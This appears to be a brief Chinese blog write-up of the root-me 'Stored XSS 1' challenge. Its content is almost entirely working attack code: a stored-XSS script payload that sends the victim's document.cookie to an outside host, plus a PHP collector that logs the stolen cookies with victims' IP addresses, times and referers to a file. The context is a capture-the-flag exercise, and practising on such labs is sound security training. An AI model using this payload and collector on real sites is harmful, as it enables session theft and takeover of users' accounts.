root-me Javascript – Stored XSS 1坑爹题

这题我知道是XSS,但是没想到尼玛真的是要偷cookie啊。。

<script>document.write(‘<img src=”http://woldy.net/xss.php?c=’ + encodeURI(document.cookie) + ‘”/>’)</script>

 

 

<?php
$cookie = $_GET[‘c’];
$ip = getenv (‘REMOTE_ADDR’);
$time=date(“j F, Y, g:i a”);
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘victim.htm’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.'<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$time. ‘<br> Referer: ‘.$referer.'<br><br><br>’);
fclose($fp);
?>

 

发表评论